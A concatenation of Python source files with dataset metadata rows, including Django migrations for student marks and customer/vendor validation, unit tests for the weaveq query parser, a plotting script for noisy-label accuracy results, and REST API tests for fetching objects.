                'password1': 'Test1234$',
                'password2': 'Test1234$'
            }
        )
        self.assertEqual(response.status_code, 400)

        # TODO(review): blank-email and blank-password variants were disabled —
        # presumably the backend does not yet return 400 for them. Re-enable
        # once new_user_save validates those fields.
| 28.671835
| 88
| 0.536319
| 1,117
| 11,096
| 5.182632
| 0.111907
| 0.040421
| 0.095353
| 0.120228
| 0.814821
| 0.802211
| 0.779755
| 0.75298
| 0.732078
| 0.697875
| 0
| 0.01931
| 0.346611
| 11,096
| 386
| 89
| 28.746114
| 0.779172
| 0.306236
| 0
| 0.57377
| 0
| 0
| 0.145839
| 0.048085
| 0
| 0
| 0
| 0
| 0.092896
| 1
| 0.114754
| false
| 0.076503
| 0.016393
| 0
| 0.229508
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
b8b79f04fc405c8d99b96eb4edb54d9c709759ce
| 1,962
|
py
|
Python
|
blog/migrations/0003_auto_20200118_1155.py
|
Ishita1608/django_project
|
c2cf9040073214eaa7ff5951d88c4a401e72875f
|
[
"bzip2-1.0.6"
] | 1
|
2021-09-12T07:09:11.000Z
|
2021-09-12T07:09:11.000Z
|
blog/migrations/0003_auto_20200118_1155.py
|
Ishita1608/django_project
|
c2cf9040073214eaa7ff5951d88c4a401e72875f
|
[
"bzip2-1.0.6"
] | null | null | null |
blog/migrations/0003_auto_20200118_1155.py
|
Ishita1608/django_project
|
c2cf9040073214eaa7ff5951d88c4a401e72875f
|
[
"bzip2-1.0.6"
] | 1
|
2021-09-12T07:09:12.000Z
|
2021-09-12T07:09:12.000Z
|
# Generated by Django 2.2.6 on 2020-01-18 06:25
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django (see the header comment above). Do not edit
    # applied migrations by hand — create a new migration for further schema
    # changes instead.

    dependencies = [
        ('blog', '0002_auto_20200116_2309'),
    ]

    operations = [
        # All new columns are nullable so existing Enroll rows stay valid
        # without a default value.
        migrations.AddField(
            model_name='enroll',
            name='outofmid',
            field=models.IntegerField(null=True),
        ),
        # Per-subject mark columns (sub1mark .. sub5mark).
        migrations.AddField(
            model_name='enroll',
            name='sub1mark',
            field=models.IntegerField(null=True),
        ),
        migrations.AddField(
            model_name='enroll',
            name='sub2mark',
            field=models.IntegerField(null=True),
        ),
        migrations.AddField(
            model_name='enroll',
            name='sub3mark',
            field=models.IntegerField(null=True),
        ),
        migrations.AddField(
            model_name='enroll',
            name='sub4mark',
            field=models.IntegerField(null=True),
        ),
        migrations.AddField(
            model_name='enroll',
            name='sub5mark',
            field=models.IntegerField(null=True),
        ),
        # Per-subject name columns (subject1 .. subject5).
        migrations.AddField(
            model_name='enroll',
            name='subject1',
            field=models.TextField(max_length=15, null=True),
        ),
        migrations.AddField(
            model_name='enroll',
            name='subject2',
            field=models.TextField(max_length=15, null=True),
        ),
        migrations.AddField(
            model_name='enroll',
            name='subject3',
            field=models.TextField(max_length=15, null=True),
        ),
        migrations.AddField(
            model_name='enroll',
            name='subject4',
            field=models.TextField(max_length=15, null=True),
        ),
        migrations.AddField(
            model_name='enroll',
            name='subject5',
            field=models.TextField(max_length=15, null=True),
        ),
    ]
| 28.434783
| 61
| 0.531091
| 176
| 1,962
| 5.8125
| 0.272727
| 0.193548
| 0.247312
| 0.290323
| 0.770283
| 0.770283
| 0.734115
| 0.734115
| 0.695992
| 0.695992
| 0
| 0.039969
| 0.349643
| 1,962
| 68
| 62
| 28.852941
| 0.761755
| 0.022936
| 0
| 0.709677
| 1
| 0
| 0.094517
| 0.01201
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.016129
| 0
| 0.064516
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b218c10762089571ba112b83de4849b6cf5360b9
| 2,947
|
py
|
Python
|
customers/migrations/0003_auto_20170527_2129.py
|
venkat0708/BalajiVV
|
ddf74d26a7ecae3f3bc5a902dcab09bf8f30e448
|
[
"MIT"
] | null | null | null |
customers/migrations/0003_auto_20170527_2129.py
|
venkat0708/BalajiVV
|
ddf74d26a7ecae3f3bc5a902dcab09bf8f30e448
|
[
"MIT"
] | null | null | null |
customers/migrations/0003_auto_20170527_2129.py
|
venkat0708/BalajiVV
|
ddf74d26a7ecae3f3bc5a902dcab09bf8f30e448
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-05-27 15:59
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
    """Auto-generated schema migration for the ``customers`` app.

    Adds ``created_date``/``updated_date`` audit timestamps to the
    ``Customer`` and ``Vendor`` models, and tightens validation on their
    ``city``, ``name`` and ``phone_number`` fields with RegexValidators.
    """

    dependencies = [
        ('customers', '0002_vendor'),
    ]

    operations = [
        # auto_now_add fields need a one-off default to backfill existing
        # rows; preserve_default=False drops that default afterwards.
        migrations.AddField(
            model_name='customer',
            name='created_date',
            field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='customer',
            name='updated_date',
            field=models.DateTimeField(auto_now=True),
        ),
        migrations.AddField(
            model_name='vendor',
            name='created_date',
            field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='vendor',
            name='updated_date',
            field=models.DateTimeField(auto_now=True),
        ),
        # city/name accept alphabetic characters only; phone_number must be
        # exactly 10 digits (stored in a 13-char column).
        migrations.AlterField(
            model_name='customer',
            name='city',
            field=models.CharField(max_length=80, validators=[django.core.validators.RegexValidator(code='invalid_city', message='city should contain only alphabets', regex='^[a-zA-Z]*$')]),
        ),
        migrations.AlterField(
            model_name='customer',
            name='name',
            field=models.CharField(max_length=80, validators=[django.core.validators.RegexValidator(code='invalid_name', message='name should contain only alphabets', regex='^[a-zA-Z]*$')]),
        ),
        migrations.AlterField(
            model_name='customer',
            name='phone_number',
            field=models.CharField(max_length=13, validators=[django.core.validators.RegexValidator(code='invalid Phone number', message='Phone number should contain only 10 numbers', regex='^[0-9]{10}$')]),
        ),
        migrations.AlterField(
            model_name='vendor',
            name='city',
            field=models.CharField(max_length=80, validators=[django.core.validators.RegexValidator(code='invalid_city', message='city should contain only alphabets', regex='^[a-zA-Z]*$')]),
        ),
        migrations.AlterField(
            model_name='vendor',
            name='name',
            field=models.CharField(max_length=80, validators=[django.core.validators.RegexValidator(code='invalid_name', message='name should contain only alphabets', regex='^[a-zA-Z]*$')]),
        ),
        migrations.AlterField(
            model_name='vendor',
            name='phone_number',
            field=models.CharField(max_length=13, validators=[django.core.validators.RegexValidator(code='invalid Phone number', message='Phone number should contain only 10 numbers', regex='^[0-9]{10}$')]),
        ),
    ]
| 42.1
| 207
| 0.623346
| 311
| 2,947
| 5.778135
| 0.237942
| 0.050083
| 0.077908
| 0.096828
| 0.869226
| 0.869226
| 0.794658
| 0.794658
| 0.794658
| 0.794658
| 0
| 0.020161
| 0.24262
| 2,947
| 69
| 208
| 42.710145
| 0.784946
| 0.023074
| 0
| 0.83871
| 1
| 0
| 0.192629
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.064516
| 0
| 0.112903
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b2806b9ce183089352a1da20e11abdbcbdb705ee
| 15,800
|
py
|
Python
|
tests/unit/parser_test.py
|
jamesmistry/weaveq
|
810f6664a06dcbf5808f837baffe66830f14b30b
|
[
"MIT"
] | null | null | null |
tests/unit/parser_test.py
|
jamesmistry/weaveq
|
810f6664a06dcbf5808f837baffe66830f14b30b
|
[
"MIT"
] | null | null | null |
tests/unit/parser_test.py
|
jamesmistry/weaveq
|
810f6664a06dcbf5808f837baffe66830f14b30b
|
[
"MIT"
] | null | null | null |
"""@package parser_test
Tests for weaveq.parser
"""
import unittest
from weaveq.parser import TextQuery, DataSourceBuilder
from weaveq.wqexception import TextQueryCompileError
class TestDataSource(object):
    """Stand-in data source that always succeeds.

    Remembers the URI and filter it was constructed with and renders them
    through ``__str__`` so assertions can inspect what the compiler built.
    """

    def __init__(self, source_uri, filter_string):
        self._src = source_uri
        self._flt = filter_string

    def __str__(self):
        """Assertion-friendly rendering of the captured constructor args."""
        return "<uri={0}, filter={1}>".format(self._src, str(self._flt))
class TestDataSourceBuilder(DataSourceBuilder):
    """Builder mock: produces TestDataSource objects, or None when told to fail."""

    def __init__(self, fail=False):
        self._fail = fail

    def __call__(self, source_uri, filter_string):
        """Build a TestDataSource, or return None to simulate builder failure."""
        if self._fail:
            return None
        return TestDataSource(source_uri, filter_string)
class TestTextQuery(unittest.TestCase):
    """Tests for compilation of the weaveq text query language by TextQuery.

    Expected values assert against the string form of the compiled query
    steps produced by the mock data sources above.
    """

    def setUp(self):
        """Fresh compiler backed by an always-succeeding builder mock.

        Shared by every test except test_failed_datasource, which needs a
        failing builder.
        """
        self.subject = TextQuery(TestDataSourceBuilder())

    def test_no_process_clause(self):
        """Text query with no process clause raises a compile error.
        """
        with self.assertRaises(TextQueryCompileError):
            self.subject.compile_query('#from "source1" #as a1 #filter |filter1|')

    def test_join(self):
        """Join clause, no options
        """
        result = self.subject.compile_query('#from "source1" #as a1 #filter |filter1| #join-to "source2" #as a2 #where a1.field1 = a2.field2')
        self.assertEqual(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=JOIN, q={1}, rels=[[field1 == field2]], exclude_empty=False, field_name=None, array=False>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=None>"))

    def test_multi_step_process(self):
        """Multi-step process: a join followed by two pivots
        """
        result = self.subject.compile_query('#from "source1" #as a1 #filter |filter1| #join-to "source2" #as a2 #where a1.field1 = a2.field2 #pivot-to "source3" #as a3 #where a2.field1 = a3.field2 #pivot-to "source4" #as a4 #where a3.field2 = a4.field1')
        self.assertEqual(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=JOIN, q={1}, rels=[[field1 == field2]], exclude_empty=False, field_name=None, array=False>,<pos=2, op=PIVOT, q={2}, rels=[[field1 == field2]]>,<pos=3, op=PIVOT, q={3}, rels=[[field2 == field1]]>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=None>", "<uri=source3, filter=None>", "<uri=source4, filter=None>"))

    def test_join_filter(self):
        """Join clause with filter
        """
        result = self.subject.compile_query('#from "source1" #as a1 #filter |filter1| #join-to "source2" #as a2 #filter |filter2| #where a1.field1 = a2.field2')
        self.assertEqual(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=JOIN, q={1}, rels=[[field1 == field2]], exclude_empty=False, field_name=None, array=False>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=filter2>"))

    def test_join_exclude_empty(self):
        """Join clause, exclude empty option
        """
        result = self.subject.compile_query('#from "source1" #as a1 #filter |filter1| #join-to "source2" #as a2 #where a1.field1 = a2.field2 #exclude-empty')
        self.assertEqual(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=JOIN, q={1}, rels=[[field1 == field2]], exclude_empty=True, field_name=None, array=False>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=None>"))

    def test_join_array(self):
        """Join clause, array option
        """
        result = self.subject.compile_query('#from "source1" #as a1 #filter |filter1| #join-to "source2" #as a2 #where a1.field1 = a2.field2 #array')
        self.assertEqual(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=JOIN, q={1}, rels=[[field1 == field2]], exclude_empty=False, field_name=None, array=True>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=None>"))

    def test_join_field_name(self):
        """Join clause, field name option
        """
        result = self.subject.compile_query('#from "source1" #as a1 #filter |filter1| #join-to "source2" #as a2 #where a1.field1 = a2.field2 #field-name test_name')
        self.assertEqual(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=JOIN, q={1}, rels=[[field1 == field2]], exclude_empty=False, field_name=test_name, array=False>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=None>"))

    def test_join_all_options(self):
        """Join clause, all options
        """
        result = self.subject.compile_query('#from "source1" #as a1 #filter |filter1| #join-to "source2" #as a2 #where a1.field1 = a2.field2 #exclude-empty #array #field-name test_name')
        self.assertEqual(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=JOIN, q={1}, rels=[[field1 == field2]], exclude_empty=True, field_name=test_name, array=True>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=None>"))

    def test_pivot(self):
        """Pivot clause
        """
        result = self.subject.compile_query('#from "source1" #as a1 #filter |filter1| #pivot-to "source2" #as a2 #where a1.field1 = a2.field2')
        self.assertEqual(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=PIVOT, q={1}, rels=[[field1 == field2]]>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=None>"))

    def test_pivot_filter(self):
        """Pivot clause with filter
        """
        result = self.subject.compile_query('#from "source1" #as a1 #filter |filter1| #pivot-to "source2" #as a2 #filter |filter2| #where a1.field1 = a2.field2')
        self.assertEqual(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=PIVOT, q={1}, rels=[[field1 == field2]]>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=filter2>"))

    def test_compound_expression_and(self):
        """Compound expression - 2 and'ed expressions
        """
        result = self.subject.compile_query('#from "source1" #as a1 #filter |filter1| #pivot-to "source2" #as a2 #filter |filter2| #where a1.field1 = a2.field2 and a1.field2 != a2.field3')
        self.assertEqual(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=PIVOT, q={1}, rels=[[field1 == field2, field2 != field3]]>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=filter2>"))

    def test_compound_expression_or(self):
        """Compound expression - 2 or'ed expressions
        """
        result = self.subject.compile_query('#from "source1" #as a1 #filter |filter1| #pivot-to "source2" #as a2 #filter |filter2| #where a1.field1 = a2.field2 or a1.field2 != a2.field3')
        self.assertEqual(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=PIVOT, q={1}, rels=[[field1 == field2], [field2 != field3]]>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=filter2>"))

    def test_compound_expression_and_or(self):
        """Compound expression - and/or compound expression
        """
        result = self.subject.compile_query('#from "source1" #as a1 #filter |filter1| #pivot-to "source2" #as a2 #filter |filter2| #where a1.field1 = a2.field2 and a1.field2 = a2.field3 or a1.field3 = a2.field4')
        self.assertEqual(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=PIVOT, q={1}, rels=[[field1 == field2, field2 == field3], [field3 == field4]]>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=filter2>"))

    def test_compound_expression_grouped(self):
        """Compound expression - and/or compound expression grouped by parens
        """
        result = self.subject.compile_query('#from "source1" #as a1 #filter |filter1| #pivot-to "source2" #as a2 #filter |filter2| #where a1.field1 = a2.field2 and (a1.field2 = a2.field3 or a1.field3 = a2.field4)')
        self.assertEqual(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=PIVOT, q={1}, rels=[[field1 == field2, field2 == field3], [field1 == field2, field3 == field4]]>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=filter2>"))

    def test_compound_expression_grouped_multilevel(self):
        """Compound expression - multiple sub-expressions grouped by nested parens
        """
        result = self.subject.compile_query('#from "source1" #as a1 #filter |filter1| #pivot-to "source2" #as a2 #filter |filter2| #where (a1.field1 = a2.field2 and (a1.field2 = a2.field3 or (a1.field3 = a2.field4 and a1.field4 = a2.field5)))')
        self.assertEqual(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=PIVOT, q={1}, rels=[[field1 == field2, field2 == field3], [field1 == field2, field3 == field4, field4 == field5]]>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=filter2>"))

    def test_literal_escape(self):
        """String literals escape sequences work
        """
        result = self.subject.compile_query('#from "sou\\\"rce\\\\1" #as a1 #filter |filter1| #pivot-to "sou\\\"rce\\\\2" #as a2 #filter |filter2| #where a1.field1 = a2.field2 or a1.field2 != a2.field3')
        self.assertEqual(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=PIVOT, q={1}, rels=[[field1 == field2], [field2 != field3]]>".format("<uri=sou\"rce\\1, filter=filter1>", "<uri=sou\"rce\\2, filter=filter2>"))

    def test_filter_escape(self):
        """Filter escape sequence works
        """
        result = self.subject.compile_query('#from "source1" #as a1 #filter |filt\\|er1| #pivot-to "source2" #as a2 #filter |filter\\|2| #where a1.field1 = a2.field2 or a1.field2 != a2.field3')
        self.assertEqual(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=PIVOT, q={1}, rels=[[field1 == field2], [field2 != field3]]>".format("<uri=source1, filter=filt|er1>", "<uri=source2, filter=filter|2>"))

    def test_filter_optional(self):
        """Filters are optional
        """
        result = self.subject.compile_query('#from "source1" #as a1 #pivot-to "source2" #as a2 #where a1.field1 = a2.field2 or a1.field2 != a2.field3')
        self.assertEqual(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=PIVOT, q={1}, rels=[[field1 == field2], [field2 != field3]]>".format("<uri=source1, filter=None>", "<uri=source2, filter=None>"))

    def test_valid_identifier_chars(self):
        """Identifiers can contain the full range of valid characters
        """
        result = self.subject.compile_query('#from "source1" #as a_1t@$a? #filter |filter1| #pivot-to "source2" #as a_2t@$a? #filter |filter2| #where a_1t@$a?.field1 = a_2t@$a?.field2 or a_1t@$a?.field2 != a_2t@$a?.field3')
        self.assertEqual(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=PIVOT, q={1}, rels=[[field1 == field2], [field2 != field3]]>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=filter2>"))

    def test_malformed_relation_nolhs(self):
        """Relation with no LHS
        """
        with self.assertRaises(TextQueryCompileError):
            self.subject.compile_query('#from "source1" #as a1 #filter |filter1| #pivot-to "source2" #as a2 #filter |filter2| #where = a2.field2')

    def test_malformed_relation_norhs(self):
        """Relation with no RHS
        """
        with self.assertRaises(TextQueryCompileError):
            self.subject.compile_query('#from "source1" #as a1 #filter |filter1| #pivot-to "source2" #as a2 #filter |filter2| #where a1.field1 = ')

    def test_malformed_relation_badop(self):
        """Relation with an invalid comparison operator
        """
        with self.assertRaises(TextQueryCompileError):
            self.subject.compile_query('#from "source1" #as a1 #filter |filter1| #pivot-to "source2" #as a2 #filter |filter2| #where : a2.field2')

    def test_missing_alias(self):
        """Pivot clause missing its #as alias
        """
        with self.assertRaises(TextQueryCompileError):
            self.subject.compile_query('#from "source1" #as a1 #filter |filter1| #pivot-to "source2" #filter |filter2| #where a1.field1 = a2.field2')

    def test_missing_where(self):
        """Pivot clause missing its #where clause
        """
        with self.assertRaises(TextQueryCompileError):
            self.subject.compile_query('#from "source1" #as a1 #filter |filter1| #pivot-to "source2" #as a2 #filter |filter2|')

    def test_unresolved_alias(self):
        """An invalid alias causes exception
        """
        with self.assertRaises(TextQueryCompileError):
            self.subject.compile_query('#from "source1" #as a1 #filter |filter1| #pivot-to "source2" #as a2 #filter |filter2| #where a3.field1 = a2.field2')

    def test_ordered_alias(self):
        """Aliases can be used to express operands in any order
        """
        result = self.subject.compile_query('#from "source1" #as a1 #filter |filter1| #pivot-to "source2" #as a2 #where a2.field2 = a1.field1')
        self.assertEqual(str(result), "<pos=0, op=SEED, q={0}>,<pos=1, op=PIVOT, q={1}, rels=[[field1 == field2]]>".format("<uri=source1, filter=filter1>", "<uri=source2, filter=None>"))

    def test_failed_datasource(self):
        """Failure to create a data source causes exception
        """
        subject = TextQuery(TestDataSourceBuilder(True))
        with self.assertRaises(TextQueryCompileError):
            subject.compile_query('#from "source1" #as a1 #filter |filter1| #pivot-to "source2" #as a2 #where a2.field2 = a1.field1')
| 52.666667
| 401
| 0.657405
| 1,991
| 15,800
| 5.086389
| 0.082873
| 0.057273
| 0.090649
| 0.101313
| 0.823146
| 0.810408
| 0.793424
| 0.781179
| 0.781179
| 0.769033
| 0
| 0.041203
| 0.187405
| 15,800
| 299
| 402
| 52.842809
| 0.747566
| 0.088924
| 0
| 0.435065
| 0
| 0.292208
| 0.465721
| 0.00295
| 0
| 0
| 0
| 0
| 0.175325
| 1
| 0.201299
| false
| 0
| 0.019481
| 0
| 0.25974
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b280dfca02d3dccdb48f32545932f488b253baea
| 5,375
|
py
|
Python
|
Train-time/plot_final_performance.py
|
dapeter/BinaryNet
|
c6050d96e69eb6e94aebe232ad21276292f04313
|
[
"BSD-3-Clause"
] | null | null | null |
Train-time/plot_final_performance.py
|
dapeter/BinaryNet
|
c6050d96e69eb6e94aebe232ad21276292f04313
|
[
"BSD-3-Clause"
] | null | null | null |
Train-time/plot_final_performance.py
|
dapeter/BinaryNet
|
c6050d96e69eb6e94aebe232ad21276292f04313
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import numpy as np
import matplotlib.pyplot as plt
import csv
from glob import glob
# Marker/colour codes, indexed by dataset position within a group.
# NOTE(review): "o" is not a standard single-letter matplotlib colour code;
# it is only safe here because no group has more than 4 entries -- confirm
# before extending the data_dirs lists.
colors = ["r", "g", "b", "m", "o", "c"]


def _read_meta(meta_path):
    """Parse a file of ``key=value`` lines into a stripped str->str dict."""
    meta = {}
    with open(meta_path, "r") as param_file:
        for line in param_file:
            key, val = line.partition("=")[::2]
            meta[key.strip()] = val.strip()
    return meta


def _finish_figure(fig_id, ylim, xlim, out_path):
    """Decorate figure ``fig_id``, save it to ``out_path`` and close it."""
    plt.figure(fig_id)
    plt.grid()
    plt.xlabel(r"Number of noisy labels per clean label $\alpha$")
    # NOTE(review): the plotted values are 100-accuracy (an error rate) but
    # the label says accuracy -- kept as-is to preserve the original output.
    plt.ylabel("Prediction accuracy")
    plt.ylim(*ylim)
    plt.xlim(*xlim)
    plt.legend(loc="lower left")
    plt.savefig(out_path)
    plt.close(fig_id)


def _plot_group(data_dirs, fig_nonbin, fig_bin, fig_combo, prefix, ylim, xlim):
    """Plot final performance curves for one dataset group.

    For each results directory, curves of 100-accuracy vs. alpha are added
    to the non-binarized overview (``fig_nonbin``), the binarized overview
    (``fig_bin``), and a per-network combined figure (``fig_combo``) which
    is saved and closed immediately.  The two overview figures are saved as
    ``<prefix>_overview[_binary].png`` after the loop.
    """
    for c, data_dir in enumerate(data_dirs):
        binary_performance = []
        nonbinary_performance = []
        for sub_dir in glob('./results/' + data_dir + "/*/"):
            meta = _read_meta(sub_dir + "params.txt")
            alpha = int(meta["nalpha"])
            # Final-epoch accuracy is column 8 of the last performance row.
            accuracy = np.loadtxt(sub_dir + "performance.dat")[-1, 8]
            if meta["binary"] == "True":
                binary_performance.append([alpha, accuracy])
            elif meta["binary"] == "False":
                nonbinary_performance.append([alpha, accuracy])
            else:
                print("???")
                exit(-1)
        # Sort each series by alpha so the line plots are monotone in x.
        binary_performance = np.sort(np.array(binary_performance), axis=0)
        nonbinary_performance = np.sort(np.array(nonbinary_performance), axis=0)
        meta = _read_meta('./results/' + data_dir + "/meta.txt")
        label = meta["network"] + meta["layer"]
        plt.figure(fig_nonbin)
        plt.plot(nonbinary_performance[:, 0], 100 - nonbinary_performance[:, 1],
                 colors[c] + "o-", label=label)
        plt.figure(fig_bin)
        plt.plot(binary_performance[:, 0], 100 - binary_performance[:, 1],
                 colors[c] + "s--", label="Binarized " + label)
        plt.figure(fig_combo)
        plt.plot(nonbinary_performance[:, 0], 100 - nonbinary_performance[:, 1],
                 colors[c] + "o-", label=label)
        plt.plot(binary_performance[:, 0], 100 - binary_performance[:, 1],
                 colors[c] + "s--", label="Binarized " + label)
        _finish_figure(fig_combo, ylim, xlim,
                       "./plots/" + prefix + "_" + label + ".png")
    _finish_figure(fig_nonbin, ylim, xlim,
                   "./plots/" + prefix + "_overview.png")
    _finish_figure(fig_bin, ylim, xlim,
                   "./plots/" + prefix + "_overview_binary.png")


# MNIST
_plot_group(["mnist_mlp_1_layer", "mnist_mlp_2_layer", "mnist_cnn_2_layer"],
            1, 2, 3, "mnist_uniform", (50, 100), (0, 100))
# Cifar10
_plot_group(["cifar_cnn_2_layer", "cifar_cnn_4_layer"],
            4, 5, 6, "cifar_uniform", (40, 80), (0, 10))
| 33.59375
| 139
| 0.620279
| 745
| 5,375
| 4.355705
| 0.139597
| 0.083821
| 0.046225
| 0.061633
| 0.938675
| 0.924499
| 0.914022
| 0.914022
| 0.894915
| 0.894915
| 0
| 0.029792
| 0.194419
| 5,375
| 160
| 140
| 33.59375
| 0.71963
| 0.002419
| 0
| 0.839695
| 0
| 0
| 0.208396
| 0.036194
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.038168
| 0
| 0.038168
| 0.015267
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b296c5a33a6ed3faf452bda63784d835915304f3
| 14,371
|
py
|
Python
|
testcases/test_9_get_object.py
|
evilbrave/REST_API_TESTCASES
|
dccfddf2030adbf8188e0e7bf6dbfa4fa581a420
|
[
"MIT"
] | 1
|
2018-08-07T21:53:52.000Z
|
2018-08-07T21:53:52.000Z
|
testcases/test_9_get_object.py
|
evilbrave/REST_API_TESTCASES
|
dccfddf2030adbf8188e0e7bf6dbfa4fa581a420
|
[
"MIT"
] | null | null | null |
testcases/test_9_get_object.py
|
evilbrave/REST_API_TESTCASES
|
dccfddf2030adbf8188e0e7bf6dbfa4fa581a420
|
[
"MIT"
] | 1
|
2019-01-31T13:57:34.000Z
|
2019-01-31T13:57:34.000Z
|
from urllib import quote
import test_1_device_auth
import common_data
from signature import Signature
import requests
# Base URL of the object-storage service under test (from shared test config).
url = common_data.oss_url
# url = "http://127.0.0.1:8888"
# API route prefix for object GET requests: /v1/objects/<domain>/<key>
path = "/v1/objects/"
def init_headers(headers):
    """Seed ``headers`` with the shared API key and a blank signature.

    The real X-Signature value is computed per test case.  Mutates and
    returns the same dict for chaining.
    """
    headers.update({
        'X-Api-Key': common_data.x_api_key,
        'X-Signature': "",
    })
    return headers
def init_body_content(body_content):
    """Seed ``body_content`` with the certificate serial and an empty
    access token.  Mutates and returns the same dict for chaining.
    """
    body_content.update({
        'certificate_serial': common_data.certificate_serial,
        'access_token': "",
    })
    return body_content
def _run_get_case(case_id, headers, body_content, domain, key,
                  expect_status, expect_code=None, sign=True):
    """Issue GET {url}{path}<domain>/<key> and print an OK/FAILED report.

    When ``sign`` is True the request is signed over body_content plus the
    domain and key, and the signature is placed in the X-Signature header.
    ``expect_status`` is the required HTTP status; when ``expect_code`` is
    given, the JSON body's ``code`` field must match it as well.  ``headers``
    and ``body_content`` are mutated, so callers pass copies.
    """
    if sign:
        concat_dict = body_content.copy()
        concat_dict['domain'] = domain
        concat_dict['key'] = key
        concat_text = common_data.get_concat_text(concat_dict)
        signature = Signature()
        signature.load_key(common_data.certificate_serial)
        headers['X-Signature'] = signature.sign(concat_text)
    response = requests.get(url + path + domain + "/" + key,
                            params=body_content, headers=headers)
    passed = response.status_code == expect_status
    if passed and expect_code is not None:
        passed = response.json()['code'] == expect_code
    if passed:
        print("TEST CASE %d OK" % case_id)
    else:
        print("TEST CASE %d FAILED" % case_id)
        print(response.status_code)
        print("HTTP Header:" + str(headers))
        print("HTTP Body:" + str(body_content))
        print(response.text)


def testcase_0(headers, body_content, domain, key):
    """Valid signed request succeeds (200)."""
    _run_get_case(0, headers.copy(), body_content.copy(), domain, key, 200)


def testcase_1(headers, body_content, domain, key):
    """Missing X-Api-Key header."""
    # TODO check error code -- the original test still expected 200 here.
    headers = headers.copy()
    headers.pop('X-Api-Key')
    _run_get_case(1, headers, body_content.copy(), domain, key, 200)


def testcase_2(headers, body_content, domain, key):
    """Missing X-Signature header is rejected (400 / 400.0)."""
    headers = headers.copy()
    headers.pop('X-Signature')
    _run_get_case(2, headers, body_content.copy(), domain, key,
                  400, "400.0", sign=False)


def testcase_3(headers, body_content, domain, key):
    """Empty domain is rejected (400 / 400.0)."""
    # TODO check error code
    _run_get_case(3, headers.copy(), body_content.copy(), "", key,
                  400, "400.0")


def testcase_4(headers, body_content, domain, key):
    """Empty key is rejected (400 / 400.0)."""
    # TODO check error code
    _run_get_case(4, headers.copy(), body_content.copy(), domain, "",
                  400, "400.0")


def testcase_5(headers, body_content, domain, key):
    """Missing certificate_serial parameter is rejected (400 / 400.2)."""
    body_content = body_content.copy()
    body_content.pop('certificate_serial')
    _run_get_case(5, headers.copy(), body_content, domain, key,
                  400, "400.2")


